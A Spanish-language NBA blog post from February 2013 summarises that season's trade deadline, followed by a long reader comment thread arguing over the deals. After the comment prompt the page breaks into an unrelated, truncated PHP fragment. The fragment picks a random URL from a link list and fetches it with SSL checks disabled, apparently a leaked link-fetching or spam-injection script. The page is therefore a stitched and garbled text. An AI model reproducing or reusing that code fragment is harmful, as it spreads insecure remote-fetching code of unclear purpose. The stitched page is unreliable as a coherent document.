Especial Trade Deadline 2013

21 de February de 2013 por MagicJohnson32

jj redickNi Dwight Howard, ni Josh Smith, ni Paul Pierce, ni KG, ni Millsap, ni Al Jefferson, ni Bledsoe… Los grandes nombres, una vez superado el límite para cerrar traspasos en la temporada 2012-2013, han sido JJ Redick y Jordan Crawford. A continuación resumimos lo que ha dado de sí uno de los trade deadlines más decepcionantes que se recuerdan:

Josh Smith, el gran protagonista de la mayoría de especulaciones durante los últimos días, permanece en Atlanta. Difícilmente seguirá como Hawk la próxima campaña, pero como mínimo acabará ésta en el que hasta la fecha ha sido su único equipo en la NBA. El movimiento que sí ha hecho Atlanta es traspasar a Anthony Morrow a Dallas por Dahntay Jones.

Los Celtics se quedan con Pierce y Garnett, y en cambio han optado por reforzar su maltrecho backcourt con Jordan Crawford, a quien los Wizards tenían prácticamente desterrado y que llega a Boston empaquetado y con un lazo; o, lo que es lo mismo, a cambio de los expirings de Jason Collins y Barbosa, quien está lesionado por lo que queda de temporada.

A última hora ha llegado el traspaso de JJ Redick, que ha sonado toda la tarde y finalmente se marcha a Milwaukee acompañado por Ish Smith y Gustavo Ayón. Los Bucks dan a cambio a Udrih, Lamb y Tobias Harris. Los Magic también se han hecho con Hakim Warrick. Josh McRoberts se marcha a los Bobcats.

Los Suns reciben a Haddadi y una segunda ronda a cambio de Sebastian Telfair, que competirá con Lucas III por ser el suplente de Lowry en los Raptors.

Los Heat hacen espacio en su plantilla enviando a Dexter Pittman y una segunda ronda a Memphis. Miami recibe únicamente una trade exception y posiblemente contratará algún FA interior próximamente.

Eric Maynor es nuevo jugador de los Blazers, que envían una trade exception a OK City. Los Thunder consiguen además a Ronnie Brewer, de los Knicks, que recibirán una 2ª ronda.

Los Warriors finalmente encontraron destino para Jeremy Tyler y Charles Jenkins. El pívot se va a Atlanta; el base, a los Sixers, y ambos, a cambio de segundas rondas.

Recordemos que Houston Rockets y Sacramento Kings acordaron ayer un traspaso múltiple que enviaba a Thomas Robinson, Francisco García y Toney Honeycutt a Houston y a Patrick Patterson, Toney Douglas y Cole Aldrich a Sacramento.

Comenta

29 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    No me explico lo de los Jazz.

      Citar

  2. Denise dice:
    #2

    Bueno…el Deadline ha sido una mierda, para que vamos a negarlo.

    Pero Orlando pienso que ha triunfado. Reconozco que no he visto ningun partido de Doron Lamb y Tobias Harris, pero por 2 jugadores que no contaban para el año que viene (Ayon y Smith) y Redick que pedía un pastizal por su renovacion, se han sacado a 2 jovenes como Lamb y Harris con contratos bajisimos y de 1 año de duración. Que el año que viene explotan…fap, fap, fap; que no hacen nada, pues a la calle. Y a todo esto, siguen conservando un expiring de 7 kilos de Udrih que igual le interesa renovar a la baja y ser el suplente de Nelson.

    Del otro trade Warrick por McRoberts, economicamente no pasa nada porque ambos era expiring, aunque Warrick tiene infinitamnete mas calidad que McRoberts.

    En fin, que le queda un panorama interesante para el año que viene, con el equipo muy por debajo del limite salarial, plagado de jugadores jovenes mas lo que elija en el proximo Draft, el proximo año de barbecho dejando que los rookies espabilen y para la 14/15 pueden tener más de 30 millones para fichar agentes libres en el verano de 2014 con los 12 kilos que deja Turkoglu y los 8 que puede dejar Nelson ante una posible no ejecución de su Team Option. A ver si por el camino, podemos quitarnos el contrato de Harrington.

      Citar

  3. Denise dice:
    #3

    Y otro que han triunfado han sido los Celtics con Jordan Crawford, aunque no creo que este año les sirva para mucho, porque los sigo viendo a leguas de batir a Miami ó New York, incluso por detrás de Brooklyn, Atlanta y Chicago.

      Citar

  4. Denise dice:
    #4

    MagicJohnson32:
    No me explico lo de los Jazz.

    Hombre, a los Jazz les queda margen de sobra para renovar a Jefferson y Millsap por un pastizal, y quizas han tenido una conversación con ellos y ambos han prometido renovar. Si no es así, están jugando con fuego y no creo que la ciudad tenga mucha seducción para atraer a los agentes libres de este verano.

      Citar

  5. Denise dice:
    #5

    Bueno..he leido que Orlando va a cortar al recién adquirido Warrick y entonces…qué ventaja hay parala franqucia en hacer esto? No sé supone que aunque le corten le van a tener que pagar el salario integro que le corresponda de aquí a junio?

      Citar

  6. Esteban dice:
    #6

    Los Warriors finalmente encontraron destino para Jeremy Tyler y Charles Jenkins. El pívot se va a Atlanta; el base, a los Sixers.

    lo que es tomar malas desiciones en algun momento, por el contrato de briednis, los warriors debieron ceder dos jovenes jugadores con el fin de salir del impuesto de lujo, una pena, se debio aplicar la amnistia en su momento

    me gusta mucho jenkis y tyler puede servir como cacho de carne con el tiempo al estilo collins o holins o turiaf

      Citar

  7. Txusma dice:
    #7

    Está claro que Orlando ya va directo a conseguir el número 1 del draft. Lástima que vaya a ser un draft bastante pobre y más con la lesión del que parecía que iba a ser la primera elección. Yo tengo fe en Tobias Harris pero claro, juega en la misma posición que Moe Harkless, no sé de donde sacarán minutos para ambos.
    Por los Bucks, se presenta interesante el verano con Ellis, Jennings y Redick en el mercado. Si se han hecho con Redick es porque tendrán pensado pagarle los 7 kilos que pedirá. Visto como ha ido este año yo creo q es mejor pagarle 7 a Redick que 12 a Ellis.
    Y lo de Jazz inexpicable y no inexplicable. Hay equipos que dan una costilla por expirings y ellos tienen 2. Alerta con el hueco que tienen pq acaban contrato Jefferson, Millsap, Williams, Bell, Foye, Watson y Tinsley. Tienen espacio para aburrir y a Favors, Hayward, Burks y Kanter (bueno, y un año más de Marvin Williams). No me extrañaría que ofrecieran un buen dinero por Brandon Jennings y completar un quinteto joven pero solvente. Tampoco podemos descartat un sign and trade con jefferson, por ejemplo, a cambio de un escolta. Habrá que estar atentos.
    Y Ronnie Brewer llega a los Thunder para defender a Lebron? Jugarán con Westbrook-Sefolosha-Brewer-Durant e Ibaka en una hipotética final?

      Citar

  8. Esteban dice:
    #8

    Denise:
    Y otro que han triunfado han sido los Celtics con Jordan Crawford, aunque no creo que este año les sirva para mucho, porque los sigo viendo a leguas de batir a Miami ó New York, incluso por detrás de Brooklyn, Atlanta y Chicago.

    opino igual, no lo veo jugando con doc, para rivers eramuy desordenado nate robinson, asi que imaginense a crwaford que se crre su nombre y se cree jordan

      Citar

  9. Esteban dice:
    #9

    Eric Maynor es nuevo jugador de los Blazers, que envían una trade exception a OK City. Los Thunder consiguen además a Ronnie Brewer, de los Knicks, que recibirán una 2ª ronda.

    al fin un perimetral con algo de fisico, defensa y tiro en el thunder, aunque sea para unos minutos, maynor y reggie jackson no estan para darle descanso a nadie

      Citar

  10. Denise dice:
    #10

    Txusma:
    Está claro que Orlando ya va directo a conseguir el número 1 del draft. Lástima que vaya a ser un draft bastante pobre y más con la lesión del que parecía que iba a ser la primera elección.

    ¿Quien era ese hombre lesionado que iba a ser Pick 1? Disculpa, no tengo ni idea de NCAA

      Citar

  11. Jose Luis dice:
    #11

    Nerlens Noel, pívot, 5 bloqueos por partido, es más estilo Ibaka o que un Drummond o un Bynum. 2,08 y 100 kilos aprox.

      Citar

  12. Jose Luis dice:
    #12

    Además de 11 puntos y 9 rebotes por partido (31 minutos) en NCAA. Su lunar, los tiros libres, ronda el 53%.

      Citar

  13. Txusma dice:
    #13

    Jose Luis:
    Además de 11 puntos y 9 rebotes por partido (31 minutos) en NCAA. Su lunar, los tiros libres, ronda el 53%.

    Tronco, tronco en ataque.

    Pero a lo mejor alguna franquicia le escoge bien arriba a pesar de la lesión si acaba presentándose.

      Citar

  14. Ruxixón dice:
    #14

    Denise: ¿Quien era ese hombre lesionado que iba a ser Pick 1? Disculpa, no tengo ni idea de NCAA

    Se refiere e Nerlens Noel,un center con buenos fundamentos defensivos que se ha jodido la rodilla,ligamento lateral cruzado creo(lo de Ricky).

    Sobre los movimientos:

    – Milwaukee apuesta por JJ Redick,la incógnita está en saber qué harán con Monta y Jennings.Parece que Monta va a cambiar de destino mientras que Jennings,si soy yo GM de Bucks,hago sign and trade por un pack de jugadores.Aún así,lectura a corto plazo,atar los PO’s,lectura a medio plazo Milwaukee no avanza nada y sigue en ese nivel de franquicias que aspiran a playoff y poco más.

    – Orlando cogiendo base.Movimientos sin urgencias,después de Howard se toman decisiones con poco margen para el error.Reconstrucción a largo plazo.No entiendo Bobcats que busca con McRoberts,para eso quédate con Warrick (vaya trotamundos,será su 7º equipo) que tiene una Team Option.

    – Morrow puede hacerlo bien en Dallas,jugador de rol,y Jordan Crawford para mí es una triunfada de Boston,veremos si la mentalidad de Doc y KG no atenazan a un jugador clásico microondas.

    Para mi gusto lo más interesante de todo es que los movimientos de hoy tienen continuación en verano,mucha doble lectura en sentido de hacer hueco salarial,quitarse de encima el impuesto de lujo,etc.

      Citar

  15. Esteban dice:
    #15

    Jose Luis:
    Nerlens Noel, pívot, 5 bloqueos por partido, es más estilo Ibaka o que un Drummond o un Bynum.2,08 y 100 kilos aprox.

    noi estoy seguro que fuera pick 1, no tiene espalda y es mas flaco que davis, no lo veo dominando la NBA, incluso antes de la lesion ya habia bajado en muchas quinielas sus chances
    en ataque 0 y con un fisico que le costara imponerse en defensa en la nba, no iba a ser 1

      Citar

  16. Esteban dice:
    #16

    bueno viendo lo que NO se movio el mercado, q valorcito cobra ahora KENYON MARTIN y ni hablar si hay jugadores dispuestos a aceptar un boyout, calderon por ejemplo, kaman? si las cosas sigen asi pdoria irse de dallas y ganar el titulo con el heat o con el thunder

      Citar

  17. Esteban dice:
    #17

    No entiendo Bobcats que busca con McRoberts,para eso quédate con Warrick (vaya trotamundos,será su 7º equipo) que tiene una Team Option

    jajajaja ruix, quien entiende lo que hace jordan?

    incluso si tiene suerte y consigue el pick uno de este draft, podria unir a kemba, mclemore y MKG, y hasta armar un equipo aspirante, le ha costado 13 aaños al mando de diferentes equipos, pero lo conseguira ajaja

      Citar

  18. Simon dice:
    #18

    nadie ve a Muhammad como Nº1??? hace meses era el primero en las quinielas… tan mal esta llendo en la NCAA este año?? lo siento por mi ignorancia pero hasta que no llega el march madness mi implicacion con la NCAA es bastante floja.

      Citar

  19. R1Molano dice:
    #19

    Esteban:
    Los Warriors finalmente encontraron destino para Jeremy Tyler y Charles Jenkins. El pívot se va a Atlanta; el base, a los Sixers.
    lo que es tomar malas desiciones en algun momento, por el contrato de briednis, los warriors debieron ceder dos jovenes jugadores con el fin de salir del impuesto de lujo, una pena, se debio aplicar la amnistia en su momento
    me gusta mucho jenkis y tyler puede servir como cacho de carne con el tiempo al estilo collins o holins o turiaf

    Hombre, el impacto deportivo es casi nulo. Tyler ni contaba ni había aportado nada.
    Jenkins había perdido su pequeño rol, sus minutos y su confianza. Vale que hacia mucho grupo, pero no compensa pagar el lujo. Ademas, quedamos 300k bajo el lujo, suficiente para adquirir un 1-2 de aquí a final de temporada, que si es un tio medio capaz y probado va a aportar mas que Jenkins.
    Las rondas no las vamos a ver, son ultraprotegidas para que nunca se traspasen, al menos no damos nosotros nada, que es lo que me temía, así que los movimientos son excelentes a mi gusto, sobretodo si hemos dejado íntegros los $3M de cash anuales, los cuales pueden ser útiles la noche del draft.

    Obviamente no amnistiar a Biedrins fue una cagada con la que nos queda año y medio que cargar aun.

      Citar

  20. Vader dice:
    #20

    Kenyon Martin suena para los Knicks…

    Saludos

      Citar

  21. Vader dice:
    #21

    Vader: Kenyon Martin suena para los Knicks…

    Saludos

    Me corrigo, ha fichado por 10 días.

    Saludos

      Citar

  22. Esteban dice:
    #22

    vaya bateria para los knicks, studamire, chandler, thomas, wallace, novak, camby y ahora martin jejejeje increible, de estar sanos todos tienen argumentos para pedir buenos minutos en pista

      Citar

  23. Denise dice:
    #23

    Esteban: vaya bateria para los knicks, studamire, chandler, thomas, wallace, novak, camby y ahora martin jejejeje increible, de estar sanos todos tienen argumentos para pedir buenos minutos en pista

    A estas alturas…la mitad de ellos tienen mas nombre que otra cosa.

      Citar

  24. Simon dice:
    #24

    Denise: A estas alturas…la mitad de ellos tienen mas nombre que otra cosa.

    +1. Salvo Chandler… los demás apenas son nombres. Jugadores de rol.

      Citar

  25. Esteban dice:
    #25

    Simon: +1. Salvo Chandler… los demás apenas son nombres. Jugadores de rol.

    bueno, dudo que amare sea considerado un hombre de rol, esta malo si, pero no para tanto

    wallace, cuando ha jugado, demostro su calidad y su capacidad de anotacion, de dobles largos, triples y posteadas,

    thomas es lo de siempre fuerza, concentracion y experiencia, vale sus minutos

    novak es el mejor 4 triplero de la liga a momento con permiso de bonner, no hace nada mas que tirar, no defiende ni rebotea, pero tirar vaya que sabe, un partido inspirado de el, son 21 puntos producto de 7 triples

    chandler es un all-star

    camby es el uncio que ha decepcionado feamente

    vamos que no es moco de pavo tanta esperiencia y polifuncionanlidad, mas con kenyon martin

      Citar

  26. Simon dice:
    #26

    Pues eso, jugadores de rol. Es que al describirlos tu mismo les has catalogado como jugadores de rol.

      Citar

  27. Esteban dice:
    #27

    Simon:
    Pues eso, jugadores de rol. Es que al describirlos tu mismo les has catalogado como jugadores de rol.

    justamente arranque diciendo que nadie puede considerar a amare como jugador de rol… o tu acaso si?

    los otros son de rol cierto, pero no es que lo negara, era para mostrar que no son solo nombres

      Citar

  28. Simon dice:
    #28

    No, pero no lo considero al nivel actual mucho mas. ( es cierto que está todavia volviendo de la lesión, pero el caso que a lla hora de rendimiento actual que es lo que estamos valorando al fin y al cabo Stoudmire no alcanza el nivel medio de un ala pivot en la liga ahora mismo ( ya sea por H o por B ) que eso ahora no me interesa entrar a valorarlo pues no es el tema de debate.

      Citar

  29. Denise dice:
    #29

    Esteban:

    novak es el mejor 4 triplero de la liga a momento con permiso de bonner, no hace nada mas que tirar, no defiende ni rebotea, pero tirar vaya que sabe, un partido inspirado de el, son 21 puntos producto de 7 triples

    Y Ryan Anderson?????

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>